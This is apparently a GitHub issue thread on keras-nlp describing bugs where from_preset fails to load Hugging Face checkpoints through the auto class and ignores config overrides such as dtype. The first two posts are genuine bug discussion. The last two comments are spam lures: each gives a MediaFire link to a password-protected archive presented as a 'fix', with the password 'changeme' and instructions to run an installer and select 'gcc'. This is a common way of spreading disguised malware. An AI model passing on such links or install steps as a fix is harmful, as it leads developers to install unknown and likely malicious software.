### ISSUE TITLE
`from_preset` issues for huggingface/transformers checkpoint converters

### ISSUE THREAD

**Issue by mattdangerw** [keras-team/keras-nlp#1798]
- "Auto class" functionality does not work. `keras_nlp.models.Backbone("hf://google-bert/bert-base-uncased")` will error.
- Config overrides do not work. `keras_nlp.models.BertBackbone("hf://google-bert/bert-base-uncased", dtype="bfloat16")` will not silently ignore the dtype setting.

**Comment by mattdangerw** [comment]
I also think there's a few places config overrides do not work outside of the transformers converts. E.g. instantiating a full task or preprocessor object.

**Comment by AMSNX** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
